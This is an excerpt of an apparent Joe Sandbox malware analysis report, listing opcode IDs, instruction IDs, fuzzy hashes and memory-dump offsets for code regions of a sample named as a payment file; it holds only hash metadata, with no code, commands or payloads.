                                  • Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 84fbc082f1e1b34b6312e4d91e2960d59a4b84e56c4d69960dfb33f0116fc0a8
                                  • Instruction ID: af4b18dbdcf889a96c450a9ed4ef9d280854dc93fe5ffe4d5acf2f18d253f36c
                                  • Opcode Fuzzy Hash: 84fbc082f1e1b34b6312e4d91e2960d59a4b84e56c4d69960dfb33f0116fc0a8
                                  • Instruction Fuzzy Hash: E801AF72F095008FDB569F24E4442A6B7E2FBBA701F0680F5910A6B356EFB08C46CB52
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9b673e1325dfacb2b07c147e6eec4496dedae1dc14eb3bc612f706b5cb19c337
                                  • Instruction ID: 48d89be093128adb3920a54d8dccc4b63fd230cdb814c025fb164eb0d9e0cdb4
                                  • Opcode Fuzzy Hash: 9b673e1325dfacb2b07c147e6eec4496dedae1dc14eb3bc612f706b5cb19c337
                                  • Instruction Fuzzy Hash: 2FF082796156508FC7518B34E458A663FE1AF5D215B16019DD14AC736ADAA18C00CB01
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8fe26c7b8e6a1db87f968b325b15c2e0d5dc22b80988860f98d263ba16310712
                                  • Instruction ID: 53d99136b5444c9387cf1b64f12951663c7b9706c81e54a93f85705f0a4d5b81
                                  • Opcode Fuzzy Hash: 8fe26c7b8e6a1db87f968b325b15c2e0d5dc22b80988860f98d263ba16310712
                                  • Instruction Fuzzy Hash: 85E0C2357043D08FC702ABB8E85C0A97FB5AF4A21234504DBE409CB7B7DB748C518B50
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ae14437d78bbd8f7247b0844efd4dc44c545c73d5558a7d8a96b491ce26977ef
                                  • Instruction ID: 099a64ed17ae417ef3cb662cca5ddbface9dbd1f8d9dc77c333789d15b340fce
                                  • Opcode Fuzzy Hash: ae14437d78bbd8f7247b0844efd4dc44c545c73d5558a7d8a96b491ce26977ef
                                  • Instruction Fuzzy Hash: D4E01A34B016419FEB18AF38DC4C6A877E6ABC9301F4045A5E64BE32A0EEB88941DF01
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 93593e917088791a19e1404007037a279c4e87a09a038daa74b0ae39d0cf5abd
                                  • Instruction ID: 87fd62efa2eac221d774dd799c3e1f9e1e3e7492dd811d6ac3b4704dad2ccdf3
                                  • Opcode Fuzzy Hash: 93593e917088791a19e1404007037a279c4e87a09a038daa74b0ae39d0cf5abd
                                  • Instruction Fuzzy Hash: 34D0C7CFA1E7D08FD307462178E1BD01E50AF29109F4B01D64A44476D7908889058641
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 184847bfd765bcfaadf56c11cf1ff25c1579e0b7590688ac4fd0ed2da7960c2a
                                  • Instruction ID: 70c241269385de5838280818f0f88c41e96b349c1ca105b7c3b53c591c6015f5
                                  • Opcode Fuzzy Hash: 184847bfd765bcfaadf56c11cf1ff25c1579e0b7590688ac4fd0ed2da7960c2a
                                  • Instruction Fuzzy Hash: 4ED092357002548FCA00ABB9E8088AA7BA9AF8966170101A5E90AC7762DFB59C418B94
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9212d2362ec8586429353325cd12adaf4e642423f1a5b94f2f3c8e8fb5361fdf
                                  • Instruction ID: 58e13ced17b0dea72bb48bb40b916d40b518bf4fd6ec6d0ae4565af058a78b35
                                  • Opcode Fuzzy Hash: 9212d2362ec8586429353325cd12adaf4e642423f1a5b94f2f3c8e8fb5361fdf
                                  • Instruction Fuzzy Hash: FAC08C30A10508EFCF293B90EC14AFC7AB3FF44300F400129FA02672A0CEA10D02CB12
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 171bb426f8ca650e38e847561a4a28ed733c8bae44d4327343ac8451bf8f4581
                                  • Instruction ID: 07f163bebc080b1cb255dd4f26a778316f92f5a6c58de1dc4222fb3e8018c950
                                  • Opcode Fuzzy Hash: 171bb426f8ca650e38e847561a4a28ed733c8bae44d4327343ac8451bf8f4581
                                  • Instruction Fuzzy Hash: 02C02BFA48C7880FD723037034C47893F014B3D10BF47018AC445471B3F4C004018712
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2555050475.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_26e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7bf82bc61a70f151d75b376839ce5ad5ce90d87add4e07551091fb6564547338
                                  • Instruction ID: 3b763d43cd92d4ce86b0d673862f608bdcba5985e7606854c9a5c33fa52404fc
                                  • Opcode Fuzzy Hash: 7bf82bc61a70f151d75b376839ce5ad5ce90d87add4e07551091fb6564547338
                                  • Instruction Fuzzy Hash: 8DA02230083B0C828A0033B02000020338E080020C3C000BC8A0E08B200833E0A08888